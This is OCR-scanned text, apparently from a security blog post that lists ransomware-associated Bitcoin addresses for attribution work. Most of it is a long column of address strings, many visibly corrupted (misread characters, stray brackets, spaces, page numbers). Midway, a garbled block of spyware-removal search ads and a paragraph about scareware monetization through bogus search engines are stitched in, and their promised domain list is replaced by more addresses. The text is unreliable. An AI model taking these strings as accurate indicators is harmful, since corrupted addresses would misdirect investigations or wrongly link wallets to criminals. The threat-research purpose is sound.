sae Upmann Obitcoin [1LHaSk425D2EoR6dT8t6qc4wkokKn@diVwk 


Contact Us Show Encrypted Files 
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Dear blog readers, 


I’ve decided to further extend the ransomware themed BitCoin transaction IDs and BitCoin 
addresses obtained using public sources post series with the idea to assist everyone in their 
cyber attack and cyber campaign attribution efforts. 


Sample list of publicly accessible known ransomware themed BitCoin transaction IDs and 
BitCoin addresses include: 


168LnGFvQ6cLGLLgq8mc3Ku8tLwnexwFeLE 
168Ly1lsTte9wY4p3fBSVXLPR1xBPeouPXc 
168mt9sDMgJrLKDyt2dJFD2K3XP8xF4peR 
168NS46)ZoftoxwTRcJ8PGtizH4JS3kD8y 
168pDjA2i6rgVgmhPjN4HDZg8xnz66NQC3 
168qvYsb56vfxDLjdPWinDXZatkKyAW63yD 
168rwLEsxCdXBVDhno3aTNJXH4vzzSyVZS 
168vEvrpv1XR26pWWxHhGdBHYxDY7wTL3x 
168vGZKQuYr4cnsbExpQdNM4CTm5ds2DMB 
1692SMaEo9tdpEHabquVuPRU7vgXkUyHGi 
1693wMNDy5s7LXz3uRLX6cKcfemJrmnX1tY 
169aDtEWESztcxwWYQq8rTgZWteraxX8d2gi 
169cizeh1K9zzzvTCyUdPNdpXD4T9xCksp 
169eiiIWHAW9o0pf29KM3srafP1VqRRuWeie 
1L69FH2NiIVp9VYFbPEyJ43LgCxTvsFuahq7 
169irpXNYUyZe2BdZHyzSBakh6ZLJM4sAR 
169JgMMZWambkp7aUWYiYyGeM5i2Uy662M 
169nwmMQU2RWywkKcqwYYct23wcLcRQMPcD) 
16907zfeeD9E9xEHur17Kr7VP8ehzrZPka 
169RdJPxuainKdmph69hviM4pMJCqERKZP 
169X8cH2prafcUbbTvDaHQYpfrrPDSCs8Q 
169XkHRrw6DpPF9gy6GXHUshshPySm2z74 
169ZrGa1lL4PHr8KhBD9DCB20EeG4wytjkS 
16a2xxYijFn3dure9NBKtkFsfrWabnLjQK 
16a6cfxMBEsb1mfKMPazWSBEogPbe4iH29 
1l6aaTXiIUW95HS35HtBgyZoBT6zpg4cVFsD 
16aAVHZRDnv89v7tmdWvnPJvvWUgMzEzM6 
16acfPNfKxjAkxHb7Eb2xNVSgHmSDMuVJp 
16ADeBt6kg 7iA5feDgC3ACWhTywzNBSAP2 
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16aERooDz6KZv8alnxw3poCoZS9n3Yr7Us 
16aexkjYcymwkshmdKHN5YxXttVfQWauQQW 
16aG85wwfbty17PRXW7co9eunP8P9nacf7 
16aGmzB56buWahSdeYAsMZSwotHQuw5cVR 
16AiIZCLDNMLKefdKKknEBWaMsCZVWCJJ97 
16ajsTSizsxAuPL3jQqp6xYj38bckNozmZ 
16AkK918CE9IAJr8ct1A3hM41Uijc62NcYQ 
16Akt4JeRRKySZKDBRJEEweBJ8JRpUp5dE 
16AnSRPD7b47EfCXYRterzhtonw7ubvScZ 
16AoBffzee5Vrk5eJq8)vtrGiuTWcih3fH 
1l6aod4qip6nwqHVWedWep5P9kCBiIPNCONs 
16ApFZcpnkz96XyDrY¥dw2N9Jq8Jpqh28q7 
16aQ8LdSkzWW3G4AFXwvnC8UDeEdXjEci8 
16arcUj91LknZSiqw1llagTQvUWPjuJMfbeL 
16arD8jmMxtvR8DdtdSZcp9yUIYsCTVSED 
16aScKFyScgcakN2Kmo5wk5aNtYjyev5BP 
16Askpg3LrqRINDkBHe2MwzUVzxbiY3d60 
16aVB7BXZxB3mMN6S3XAqka7jcNFVKNmThw 
l6aWJpWdXVbQ5iQ8RUA8KQadtRxjRoVRVVF 
16aWkyd1jJZzaelfFRQHXZVE8hNjHZCNx7 
L6EAXwQ9gF30T 7MLbuQdM76EYe1Q9p4wvPc 
L6OAy8NFtNjKt2cb6V7u2Z9rVy9nSiF32bu 
16aYctC5Z6mms2FxKfeBBAwxhn8vEqDwpX 
l6ayUxpkqHSxye3yNGuroTxPZKW7E2vZk6 
16aYZME8HLSt1jMSZEYMhwVf1lcEDAoy5Zd 
16AzKPt4obuDViIDQcmoP8BFCJi2Mx6b6VD 
16b1AV90K3r9Lq89ed679eMhtjt4jSHcPX 
16B4FK37VFQtcUowA1AarEttpQxE3zdp9Z 
16b4rFKtLy8NGS3etfCCacppos9j3GTdFp 
16b6ARmmfGk5d5cyJswPVBeboPXn1NjXpM 
16B88kEt7QZhrix7sFk4AtspxM1D1nZ7c5 
LEB8wt6haNU4UJmJCZMvRR4hj3rPpq6nZ2 
16bbongLvWHGDbkjQReWMfTu3f7mojAezXx 
16BeBkqszkXXQ9c1lwlktzcMyF3vLVQppMt 
16BecRfB3iyFP7rE4CKVSyxxXQ2WebuxzuM 
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1L6BET28wakjWbhWja2aMAuEnmRijqgipy6j 
L6OBffQBWoytK8cRwkvZ4GSqbqxVS5FQSf4 
16BGqGD1dDmnXbw8Q4M8Y4ap72UUEPbNP6 
L6BhZZPV98ZDFAGKDivVEN3TIZgCdqnmNnN 
16bJh6xNxEjBFaNUgAPXiJ LENWEiim5dLm 
L6EBkQuQ5nCJTFgusxX3fPquCbxoANLcxmio 
16bkzZEDAaAgXrjrwYduU3hCjxFwLlvrv165 
16BnAJ2aqwPs4gKDkyUSYnxHbg7YcAmhkz 
16bP7paBAwxWzsGkhv3fCo9b3xQvKptDxc 
16BPduBhy4DcY9yNyix3E1yCBiFcPVtas4 
16BrRd19qTzZYvuMTKz8xRWeTD4aiSmJrWr 
16BTVydgvQgdQaqy8S25Z3Q9V2cWfg44w50 
16bUc2JF4cFQDPofLtpTmMV2E5p84Fv1lMFt 
1L6bvVjKjh3gjsuLWAfA3uxSmHjSwvfrwU7 
16bx6WhSgsYyCbxJkk4vAsSnKNfLYT8cW8u 
16bYnNGgQDB2TgAqMJw3T2PHR3b2Ecc8QGt 
16c15ar9cqSN5BXTYcAgCpgVurRD7ip7UT 
16C1q1XprBrwPPWHxV2MzeKeExC88c1zRc 
16c1UiYKg72aL5Y2wopkuWgMC8rSHhgwWZr 
16C3BuggF8pSbRYX92f9BQaBBMGgpPBAINT 
16C8bXQnGUWHLvbhre4zWMt1BeYSR9qghS 
16cBXVMrko8bSicRDk5nzTpCwyYqd7zh9S 
16CciTU4Gx63rGgtgbFJHKxSH9V6UFByK1 
16ccRnNMg8K7tY51TpYiyB5djr8tiUdk6bN 
16CcSSAcKSc2B2CRn8zi9iJv2yHpuZ6ZEx 
16ccUUU7QYiu0o4mMCV67CrYNMViYH7z3XTS 
16CdjeHGdZZNXuGXVZVLmJa7xd6bduyxXeC 
16CDpvAP14WB7YsdfCwsAeHfbg57xankKVK 
16CE3ACshFkrb5b2KULM1B53dgxFA71FiG 
16CEaGBrm1BreEHsTjLssD5U9JaqGVnGGX 
1L6CFC)dxmr5SfPHWZbZF2WBBCm64EpHv5g 
16cgtn12icGbZPj3y5JCGsfnSMicCUKFTq 
16ChocCN4mp6FBPR)kwYtdX5TngDBMU9Zi 
1L6chPHSUmuUQ7fh92tHZcoGttWNp5Hu5HT 
16cif7YFKJWZMZ7N1BEJqgbDyT9FwsoTLSP 
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16CmYumLRk3bER4ruXYNiDkLTSp88VYyko 
16cn7EWkg8qeyTv5gAbqUmvoFcMZRgWmro 
16cNHGGe8uaoNW9uf6g4agbSBBCrmkvVrA} 
16coqsDiLZbNFRGu4aA5cmgkgixeaaU2yB 
16cpij75ZvSlghpPKTpdp3xfDxFxHj5LDC 
16CQqcFodulxuYZCCgCQ72BSAb6pb4xRaU 
16cxHWbiisCvtrhRraKHCn4pLKksgH1oY6 
16cXM7NntiqQz4p5aZSH9CDUCXWicpXvF2 
16CztTfKZEB8mzsHfnsvTRMLmM5Qtwwoa4 
16d2U1yBdtBiffkLA4qbDeNSKgTGZizmFa 
16D3HWxaA5FL9OQvPnuXamihffKV2S TecZA 
16d9C4png4nm3dFxDtZZfq2GGPWVmWry18 
16DaSDeV29g74tJRSVmM94a41xGCXYRPStv 
LEDBE6LcVQbT3VhZ1QktSkkfo2FtqXXL6fs 
16dceUPQCuQayDGCirspk8ZWvRF2UQhHRd 
16DEQBqUQL5UrMCptT9Sp56rCXqPaotql7 
1L6DhR8ToniznluGqs7P4PRc7cXyQndyei7 
16Di1ZKN6w3RX7BvoCCvzbCBwj844di54x 
1L6DiI6hABMH3dQAQMJ1LhD1k7jcxKzC64P7R 
1L6DIFIMAhkoPiwQm8nAZHgXSJzcVFfbk4o 
16Dk6EqWemNaHkrA6iG1PyraSVbUsw2QCT 
16DL6kLGpJwV7h3pmNygunJSKH8mBLEPFs 
16D01D2kSWnJBFki6yXSMHUg3Cv7TT8LiV 
16DoagQjHTPSHvb5tFQ2Dao0P7LB7VxcJKN 
16DoUnsG2ajYTMhxc2gBE4Sb4gBnkn18H4 
16DoxP5GCYEi6Sdsed5Bu5nW3)JmH9VodiTS 
16dQc8XUa6DTmrxrDUD48ZXwr27jCac3HY 
1L6DqoFx7MxXoTVbXK7ApdzsJffhkR2DYU2 
16Dr3phwwyYr78YrufRDrVacSDJFtpU89bL 
16dRD7hmv9Dg7YoqngLtMXMVu2N5Wz6dWM 
16dsv5hsv5aAPARPLD8TRWBKfoEqzALH6T 
16DTmfMoV4X6BH7L8YCIGATUy 7nqtjD9J2 
16DUmeUfQ6YYU2FZTumkcwwZeVvPimTGp6o 
16Dz45jZYSQVUSWIYSY]ddYomi1Zrkj9jf 
16DzcQ7y3pCx8TRSxTWLWEA7tRALK2tjeg 
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16e1lyoEpMR3R4sEAi5GEbnWKrNVApYA3N3 
16E2cnDBBGj6nywFUYQoagypG76CQQq3cz 
16e3vqpuMhhmWMQEdtzvj VppeSbWoAECXD 
16E93g59kNqkevUZhuCjsnTWPrU7Ja5U2P 
16e9WUM4VwKG9DohxXQV5wbHMagJfg85Caf 
16eA3eEr8iSwilKtaW8Roz1TvogjX8jaoB 
16ebbbAcpPvpJRHrwuK75jiNc5Wr3zkyW7 
1L6EbWBe9kgmCabfiCbrZzE8ccmujY2eCbX 
16ED3WVsSUTQ2vCn6jRCQLMjm5xp8kkC3wj 
16EDTPCBUAtRNrjzsB9v3PRrUMHjJZMZQ3v 
16EEfBtGhrGqBDdasLtcVwhTmVjmLvPxLa 
16eEVt2PMqwjbmht3wSeepBvu2VuuBvaba 
16Ef9UZ4ux9tTCZQnAtMGslhwnsJjRXAca 
16eFUMASPuPz4EPgkac9rWuFzql vBgNwDE 
16eG67o0vFv8ErZJkdFV4CuMPABRytnjVim 
L6EHNDUTxhXroWXVNAxm6raGVtafGccbKJK 
16eHgBSKFQpAUsbRRUMWFQKhQwkFX8W2zzb 
16EiPcpo3VzkB5yhBUyXprHwozyYaakctz6 
16ejZhd7eiB64STg408wPUZKjTZGWN5YDB 
16EKepwUmGcdjkydPKJ HB4ygVEPum3qDSd 
16EkvvEmKo2pEwrsvt5 7eXFAZd3XXDKJrP 
16eMkJpjc5QRRJMLiIFMeqo9dC4BGwhAenH 
16emXYd9WHaY9MiplLhqJ63sDM50sHsMs2m2 
16ENGKqcjEanTaybrs6uxGqsAQQ6gAgd7D 
1L6ENxFWcyTJvB37WohpQKgefc2hVXvzBLS 
L6EQiwd2uvujUXtycgmC9hKqmBiJv9dvoa 
16EQKQe6qVmvknt)tFoYoVvfwmri2uCBwC 
1L6EqsTFxWQHaFgUkj WeUP9H8Xv3tv7ympP 
16eSEi3R6JcbkUQbrZ7y1siMNzZ6EsRSLVS 
16etfxhUm)fPhvaf9i242TnjijcYagojxG 
16eTOB8kbEwWLk2wszhfgP8VadBziJYj8Bx 
16Eu9RZnkZtDm2hPdh2ogPiGngZ4y8WVgo 
1L6EV6kKF5ESd4QPNH 2Zef3rrk37iScjSvjSd 
16eVHjXZeKEgB8zhYQ8JFSUxXpLjEy8bb8 
16evS2CQ8ZVbSp6L7jzy2f]/UpVMxuoBFNn 
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16EVxtw5Go2RPJ6VCPdDgkj3Mnz6DBBRD5 
16EWu45kmaMFkacLJBjTqkaXWafVSF5mVq 
16f1lbNXrPh9OPFEFVoe8D81A1xtziKmw2R9 
16f1HBP7XSdjMoLAPww8b4Lbey6ZZeqSjx 
16f1MoEEzmiwUXRCYS9hwsDJMjq8dgk2iw 
16F7C1U38dC)JChMqyFlpsYGBac2wistzw 
16FaZDoK2HzRqKp4wS9yYvUe9Kfy5NPHCa 
16fB5Ra4rNmMCWhBZkSEekEHbCcEWjW36CV 
16fba5urhBRttDhj 7 MBjKNhiFnv8yzwsk4 
1L6FCdYwESUsguSJ2HGvvYbK4bX2PcgojVK 
16FFCq8SDDBCMvtEeRcKxyL8CCmqkYUnCA 
L6ffTM4mix7CWRJjAF4WEgeRTWoMifyarkN 
16fFUAwerefPCyq8vWp3vQKz2Rk5LmXKf1 
16FgG3aZKS47e6zLVAWts5taAf34ZmFe6M 
1L6FHC7cLgybiVBdJSFduwQPz5v]vkx8ezs 
16fjkKc3mseH3aghd9APCcPZCBX9hBbL5Z 
L6EfNA3N8wxlgkWseRWu6aAkNW2rxXrnWgx] 
L6OFNWBKKYZMBaPEGK4S37HAcDTXj5RiCsR 
1L6FRTIDwdJNB9OMYRj1t9aTQs63RwhZVZBeg 
16FS5vbdnAkoK53mp67R6uULNPWMmCi9G44 
16FSKdX3AQP2dWyVEmPF8eK3PAM 7ZNt1Ly 
L6FUILWNWFG71RUaA8LKBtzb8k7yzSwAk5 
16FVu3VHKHFhrf7q1l4vVuf9NePuwBc7 YAW 
L6ofwAfEyyaAfg8nW2Xr8dxrT4hQKebWaqcS 
16fWJ1KSYBFuUgxzQUuaaxb26JsPAtuNYi 
16Fx5VTCzt7LeeYT DtfcrDud5QU6BAQWKQL 
1L6FYngLykoRqg8NYvfB2SZ20uINKGHV8QV 
16g3myqZezH63u2186qsRGVqTUeWNghLNY 
16G4ZK3NhDysfX6APEMVTGRYTJNWasyVx2 
16G5XyQCmpcKhqdCS5UF9I6pFTSPLAW9M8B 
16G61GSZ4nTAsA8seKdMRXBmkerPoFDZwf 
1L6G6FttXWARvalgpgql5tXZUP1cbfL8mmYA 
16g6YWGxHTCRYudpyieuwfsBKDo6kBNSC7 
16g73ytVKreDefeYK6bbQSLhdvHdbo6évD2 
1L6EGAGOB2sKYjheotTv4YGSTK3GTzVhoSgh 
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16GC1ljvZaLrQ2CEaZZsrQw46SQayPDmFtq 
16gcc8ZMD4tj4XsFpev6JqmRTIL9vSCoz7B 
16GGeZY3erfupsMVhohfM3p1CK6HNWyGét 
16GJcf43XEv2K39kKUHxXDiICYK1sGuEaT3 
16Gk20b5qfS4i9rWMUu9v6dPMRQAVoLAwg 
16GLp8rkLgHgAipytr94QxDHH7LScMDCkKM 
16gnS3ePszUGUDMWmCLLFRfvEYMGhDG5fY 
1L6gNsTYPzZ64LxXzx4hi3PEvbS1EBMa2zVr 
16GoZU8FnGmRmbj5G8pkGqENRJCH8Cfkxo 
16Gp4cvYDp2jrgomnGGG5RvY35FwtSNRw4 
16GrFFNRaKlaU8M5ZicYrnAKju6GevWWnd 
16GrYr60KkrSiwmRw9kCpqRdkismvGdkzH 
16GSMa49jwjL96VeDv9Fr8)]GbxJLgnSGLu 
16GSZhTUGTSx38D5wZgZ9HRb5zZCAjH37MQ 
16GUdeCcwf5aZQuej8vpsZRkK1TZGSqH8RG 
16guGy loymvnSNX3SSz55EUY4L2DgWQnkc 
16guhwsCnwbjJGoibdiRkyWULbpdZBjtwdk 
LEGWNLV5yw8p12d8mv1)fgoJvoWgD77Wzs 
16gYz2cTut2LeFfDLADywQXsSVKGUAdVP7 
16GZ9ihwRSiRyC20XXuANpX6i9TkKS2GcxQ 
16H19JhHtyHvkq93uh2gwAxptsPii2pfkr 
16H5n22YRkS7pF91VCMHCGNbXUFB5aiYHw 
16h7bNWGRRI1jAPXzwXuWQgyzjGXLaRaN57 
16h7EqawcVtVjSPEOQUTEVRHfHesYdHgVB 
1L6HAr9UGNoBZZvdW2SCuXLAHeYNDjZ92SK 
L6HEg5LVaHzaqSivNse842ksGmMWSpZWV8 
16heSRPNbFk4Pm5Cne7udoFNuqVvpiljaa7) 
1L6hFv59EYfQNnRh7Ur6V)7YGP6ZFbA1gbH 
16HkadmvrLQ4HbHNYk6cBqDNKgskeQ31hG 
L6EHKNDHfhUJsamxWd6VFXU23AWkS7mfKyk 
1L6Hnw4o0qNcrS2RKSMuYJh7ptPAbm4Dj5FU 
L6HQ8jQS9FKHCUSMYvxL2b7yn9Q5XPPW4v 
16hrswM76daEkiCXd9Cy8pPUHNZXXXTHnM 
16hSjnd3XBZLk9ZHQdK2Fq2Mfgh7tFVtq4 
LOHTFFEQtLftQ7cpuY1taDjdxmEDo9WgqiQ 
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Search the wed for fapyware Search | 
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2 Free Spyware Removal Regustry Have Spynare 
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Spocmare Stomer 
i Smomare Removal 
3. Spyware Remover. Free Virus Spyware Scan Serene Ramer 
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Gat Latest Antiveus, Spyware and Firewall protection Free Download Pap World Poker Tour 
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5 FREE SPYWARE & ADWARE SCAN 
Remove Spyware Adware and Block Hackers Download Free Computer Scan and Protecbon Award-Winning Spyware and Adware Remover - Free Download 
http wrew adwareclean Corn 


6 Spyware 
Shop for Spyware and Geals on tors of other products at MorsterMMarketplace 
Nip /Nwwew monsternarketplace Com 


7. Spyware - Produkte vergleichen mit Ask.com 
Vergiechen See de besten Firewalls Virenscarner, Art-Spam und Spyware Produkte mt Ask com 
http \weew ask Com 


8 Find the Best Deals for spyware 
Find the Best Oeats Shop for spyware now 
http spyware Dest deals com 


9 Spyware 
Spyware? Finden See, was Sie heer sucher! 
http \wwew taeghche-angebote com 


10 id Of 
Does your computer have spyware on &? Protect your computer and get nd of now 
http ww weryamod Comvipyware htm 


11. Amazing! All Here! 
‘We wil show you the best webses related to Spyware 
http wew thetop 10 com 


12, Free Spyware Removal 
FREE Download for The Best Sofware to Protect Your PC fom Spyware and Adware Award Winreng Programs - Download Them All Now! 
http \weew Free-Spyware-Doctor us 


Among the new monetization tactics used are the typical [20]pay-per-click malware-friendly 
search engines which act as both, redirectors to phony sites/scams, as well as keyword 
blackholes which help them assess the popularity for a particular keyword, and therefore start 
pushing it more aggressively through a process called synonymization. 


Interestingly, they’re exclusively using the compromised .co.uk, as well as purely mali- 
cious blackhat SEO domains for scareware serving purposes, but continue using the ones they 
operate under the free DNS service providers for [21]monetization through the bogus search 
engines. The domains used in this monetization approach are as follows: 
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16hwjeiugbqnaxXxCMN5tLychBk5cf9BzgK 


16hXd7RQYFMahTwMyM32FKmkwpd2pZmUVW 


L6hY1LVXLQUFZLyJ29biK2buAZTPeRFMERE 


16HYTyx5pDM5BTXWS4BHnPNGxHbGmZg]Qx 


16Hz38j3MiBJSouyGFCw9prs2UiojBFZAG 


L6HZHTnNUDev4bePXA4BMncPDD4GV9hUD6L 


16hZTNgjPFE3drEt2WxfkgNz3cVWUJVHEx 
16i9GevTPrvJGm5xPhLRnNQVWDhurMaHks 
L6EiIANJxZqKMQJ2p8FirprE6Mm5TFICh7HD 
1L6idkvYKf3YChu14KrR43CEG 7tQ6di9nXU 
16idqYqrjNlavrbh4j18gDmMFHASmLaRmcd 
16idRU9cqmreRpdV25ZGwafCKixM1cCBmv 
16ienBrD4rBLLSjrT88xYxN7YU1lwqadNy4 
16iGFPdavSApwvY 7m61kxYJRJ2ZBmnPsQk 
16iHd4h5JEwVfHZPsdWaaYDyNfdTT8Wn5R 
16iLGNLtrjd9AvcwbFD71DcGGgFfiNsE52 
L6iIN2cbWh5hJAmx3pvYSnHPVqounbYC8K7 
16inP3LMOLX2TSLJUcfXTADLFfpdjJMuoah 
16inxiUY6JsSD4WvMRQuUHfNPjZAYZR5i7GE 
16ipGXs7fQdhMkuAyVfryuEMn3NExrE5pn 
16iSf9AGBgaYhtC17fcD7KDgnGA6wrpS6y 
16iTUac8jkf4LPud1SZBGJiyKWcoFNPA6T 
16iUnN9PxX27WbPbLON1VmjRL49E7L4DT1RL 
16iwRestLCn1lutT9LRVXVo5zkZypz4Qtd9 
16iWUNzuBdC]PygsQNc4MqqQM2uxDgRvkY 
16iWzfcoM6DLcRbkem5uB5Z3neextFEwfb 
16iXGK9CGA4S9eF XHANfmxvYA2q9MgVt9G 
16iZJrtD9GmSeNeweoYeTtmmTUulwbQpoj 
16j1ikKEL1Woe5FnGVuv4Nb7Lem7S9o0fxXqR 
16J2a9f3wnZq7C9PndoooLtij2E4dzdzJ9 
16)3kkoKcu87PvyoE8hbVX2TfG7JZHSUcf 
16J4jVhJWAA345r6pMzB31fingJFTZ57Zj 
16j9Wv2e7P1tkPvm1mV6wBh6Cr9id67cWT 
1L6JAYryU92p2AGFKCCONe3j4gpbNPoAzIs 
16J)BKMwzA2vFRHLES5R7F3u87s2DG1PLDH 
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16JBxgTLjw8gYNgbgtk8rFxPTECEofF2AW 
16JCetCL5QJwCDdV6dzPcqXvAjgBNREb2b 
16jE8DvMz9EpKowTK4Xd8UPxSiyhvvxEnW 
16jEdjdsAoy9Dvydmwj2HhvSRjSLMCWvM5 
L6JFV4N6dnbQNpRGyAA152p6ZAZehQEe4Q 
16JissLBPwrcL3G48MoUCRT5Cea2V3e2WE 
16JjCKKROGK2P5HT63BW6ZPDSt3PfxhiSP 
16JLpWvvGcdfBpJ8CHoAW76bUPfhTB9ORQU 
16JLq9gTUGugqgLMorfMQsV2gXmiNnWMkvQ 
16jLvm5)KAzaTcC5tDTyXnyNHj3gfHPGWw 
16Jm21syyDP4yY9STyZDk4Bqu4w7mhL2nF 
16jJMK9Cx7gn5fBQGYXoV4rizq4CTKbX3Mw 
16JmzfLt6d61EUVHVBMVZBQQLLxMonXAuwD 
16JNaKgyMpQr8salaxXF6dV4qNZHwnqEuaXx 
16jonGeVM8hnurN2WPBe5R9ON9Z2RYWY9aHV 
16jP7ARHCuUW3QhPZ2wGhMXxvxZfDjBkUPq 
16JP9jp9Pg65zmyU5A7abXyQsgN5JHAtBB 
16JRxXY7kA2ripYZHvqtBpQBkv1kV5vmv8v 
16JShqZRpGfB2FKFh9qMEmStnAHd14dBVP 
16jSXCwYe2FJamHhLjwxx9c8flaDRr2RMr 
LOJTJVF/XQjJMLUJtX1Ht9iY93ZaBRhrbV1G 
16jUaqcZYfCraxhEyjSMHaEdiBF4fG11We 
16JUruvirhMptaMAFHxqvKVBcAn23znnYV 
16J)WDfCwDxX39Y26ww9rdDRCEXUMaTF7vL 
L6jWHINy5q8o05jJBCikieodz7f5YDLAgGiD 
16jWqAbh19eYQDNGfNFamyabdNJxtRaV2Z 
16JwStchzopj2zqsceFCdqoTAAjAntR5wA 
16JX63NLnNYdFYRyArwwF77GKXhH8Do8gpxs 
16JxTtd7ecXQZ6WPX1PeD2Vfg68tY5HF5M 
16JZ59Ci40jaVwzxoxQY1CZhZDpeu8qNo6f 
16k3TE9FIF8ho6Un35JRDYmJPqVkUhideB 
16K4DRfBtNoGcab2UCpHf25gTDYwfK58zX 
16K4xXBSxzTTF2RYKs8pwh4HQAtXCxUwfu 
16k9v2hxkLosT489YYWjvVQycYgY5gobgG 
16KobXhWhxsHBAqYFjGf6FYCELu9fdKFDE 
25354 


16KCEXp4NUDJBUB6EaqGR85Z2THh9iIGviH 
16kcoxUhwkTvJ9RiiDvykKNsS472to34H9S 
16kdi5RoEuciRomu41Rg54eg7WzLydVFej 
16kHVommZoyZleebrSgAKwbEwiUWhnCbjq 
1L6EKKjJMU90Cfcc9k32ZTe4BNyZ7tliWgFXK 
16kMzR2jyRakL9SpMdarlypkcWqoLyY4ygp 
16KnFtiUrinJXh3PK7pGFT8wSGBqtppxXwS 
16kPwnKPzVhZFynr7PVNooapx14o06btrsx 
16KrLG5onn3qC3VFrCjboTLkLL2ahqxkKtt 
16KSjdeJ45dgbN2mMW6WUxAvqxYSPg43M8i 
16KufRBE8i2ayHpR2w5REVqktcWW21bz1i 
16KV3gFS4sxKrC3cKh3wXRSyFLKDh1jS24 
16KyKmj2Dmv2kfQnNItEHMGRQBxrzTAfFN 
16L1ILKA48n26Y1SgELpG8JLsAxv6met9vL 
16L1zhQvJ3UrP2LCF3Xc1L1G2djY7KRjok 
L6EL3HSMXuBit5Ct3Cjv3kKwDZVRDmu9rJT2 
L6EL5b6HLTUOTE41gz7KzgzgTCBryRU2JED 
16L7VuxaGQRrnbH78XEQovcTQb9hUaeGkq 
16LaExFAVhrwalGtQjcj85hpMUUY]JjjoGC 
16LgpzvqlYDCHAbznFbk2zVhbAKKJ6)22f 
16Lh6fdsfPki7YKNU1BB9UyFQ5FIwdBE4d 
16LHnu7Bcsk7STFKMPBS7qAQVSqdCmt7Y2 
16LpTe2cSyvxccDCNjZd17uVEbBR4VZKZN 
1L6LQ4Y3A4mh2w8eEy6u7CCu5gy8UDVXR2m 
16LrRAGYZ2xBPCsqDbFW6ecjLTnunicKRW 
16LUmMmv9uXuQ3x8H1qZ4eSr8YqZ89abgvG 
16LVKAnvfKgujUBU1PYSisoi33YDeA141d 
L6OLWGUj2T7HtEMBL14npEHhLesKCZKB2NT 
16LZePS7S9XEy22NJFqkv8hajCFjh8j8TR 
1L6LZKES4fBDftk1bBBJWtvS2NJPVg5MpMi 
16m1Ums19KNDjJj_LX47QkKNdVZjiiajXnQV 
16m1xrTb2U8NtqCCiTvylw14Hwe6TCtjJ57 
16m5pZ8RXULzakyCyiJ6ZhdymDCQsdHoS9 
1L6EmM8BmvBVXWUFLy5Rgit9Du965aMscDbuiQ 
1L6mM9TZRYVDAGPf2b5pjWYY39a5T2xN4QDQ 


25355 


16maJQ2uh4ygaX7C9APLKIFLC7nNY4hGTj7 
16MAo1lof48pSnf9DifqsVdvNz6AndEwA1g 
1L6mbASPRBHWVaLjZtKzZCg4nGd6jMFTtw4 
16mDKUxhaFXgDGHp4cuqgS6KsidztVaTsai 
16mDxw4Gu4JBY1ZqB7ASkbr7bQADS9Er88 
16MflwstTrf822QVHyFArVS1H1aBBXX9hBR 
LEMF4VY2Q6yKGkjuRgbMCjJSfmWps2XLnzg 
16MKpkbUvoaa82c73vYj/HHF1MaYqoxq648 
1L6MLiqiDLDAaMjjMVtz72rDYKJqeaVj44A 
L6MLN1IS4iERWFVfope8i5df3r5x9LMKP8Y 
16mLobEdFdrtDjPreprwMa3wS7kTWk6Rk9 
L6EMM35MgKJ16jZsZ4mZ7fQADx4hVQgjmR 
16mmbiNgz8JnzzHHWsogshqw4AskqLUjw4 
16mMMBwtsGjy6U67Kudwrhw3hvaHfPw9Sxi 
1L6MNYaKBTMs]f5Jun39PQfiwseVTRNHEuz 
16mPupypQjv7ZytR2tugaHEaucUf1lm75se 
16MQ2vw1liHmTLptZ4tsWFFdzDEujyaCtBB 
16MQQZ8FB8ifQCQbFaT2exfb6wfeDYUNnS3 
16mrfFZ7KabamaV7oCjipJbkdbZmCnQbxd 
L6MtSLcjvHsag2FUC3dbFDVYEMUaxXye4MS 
16Mu64W12CTzgxEpt2BQnveG8eY6DUVH5A 
L6MvdRYrTzMmtci4EJVwT 5yrjx37DAcrN2 
L6MvkVqvEu3NfUecxLAlpcpdbzo6N3jGPd 
16mxja7PWwJPHkGC6R1fmfNKbGyrEFsogV 
L6mxyjFFFtQxUR7tnUCfdbqkHCkhv95AFc 
16MzccHgxHua309wgqxsUw42ShDCeCDRpkG 
16n1UqeYHmU35HtqH8M5emCRYgntQ5Ahb} 
LON8PnN8AfhxzgmWDtB45P8rLw4emMUITYy 
1L6nBgKffluKP92SIZR5pFor8 7w2agSF9B2 
16nbmPrewUWQMbgTJbxBR59mxon3BXkkLi 
L6nBnWJiUBvrKqzYWQvC8u453vHWdvNNEc 
16nBqrusG9EYpKW 7gtEbV4JUgyvA8iuptK 
LENcDOoSCrg6Nb292X3vJTByTUSWNHjUCgh 
1L6nCfAGMZNbikKjFQM7SpGgDYvZuZ9ZQWkg 
16neZ38UPMc1Dv1hJqQ3Q2ZUSZDHG4iBBp 
25356 


LENFkvtBYVShaRtuux2SjZ6NcVseDxHg8u 
LENGGErnEM9UNnbf5zspVHufpQ6yToHvuK 
1L6nGpoyaP8KxRQrAJDUNxvm9doViymT22W 
L6ONh65bvh4aSGUFLQBbVceLFiA94exHONF 
16nh7U38BWBFYCGZJt7Fi7bbdXmubVj WBZ 
LENjCJHUNTHY1L6SG1c8bG9HQoAEsX2am 7} 
1L6nKofxZV8QFPVj 7KS28UQLN9Zpp9xPwJ 
L6NmjGgrGLNr9jz6wqoRCNDF Xnej8ffEGZ 
LENNAYUN61UAbev68ryEJ4ztydqqgjJcPrN 
LENphEGihjsG41V8CxgYuBfC4VDQ4etmHt 
1L6ngPR5DHsX4tkK30GvedvjaiHQiZANBY] 
LONrcX2BEhfV9hmgUZXhYGFcYEPrSfi7du 
LENrPuFSwKA2wKexaxuDRJhFPz8vqSvFVZ 
1L6nTndqoTzpFZhrwvR5SZEfmiQBzrQDLpC 
L6EnNTWQMeN2MASBNS9YYFv5y6qaXCCF8A3kq 
LENUVFKZtCsPmZboLjgt}j UMLF52eMYhoxg 
16Nx7bZcCH5MMok9W8tWS9EwrLn1bdCFs8d 


LONYEWR7Y3)JWKRPg9cTdW4LVgDBwWsmxXqM 


1L6NZJ1NHEP61lieFPFMn798zZL352k8gwqD2 
1607aDS6TVNseSlegrg9NnCdW9nFHE96ZS 
160gZg4uHcVBxiUuzwjwTivsejk]8siaoB 
1L60HSUAr8LIMBbtMMGhPnPgpWrxpr3qQJ8 
1L60KNpAhWSESCSvHsS6tvU3ncq7WDBPzDs 
160LDgpvKBqU7vL8SanjKrASqYMUrxuewb 
160LfdWRkKfTKY 754MNvGznfRxXo3VYXdeg 
160pixPgoKxigBvQ8fxNSbBkf}|KRAGDrAT 
160qgAMkqCtKQEcsLRD1Bhn5su8Yuk26Wc4 
160SPMpaDpgBm8ea2CxHeNSzBSidNtdUqt 
160xKNvXPxrsy2Fqm2YiBRnUja9VjAWnhW 
160xoJXLxrTsvoK2iTCv6draq)vJ 7_LAPZHn 
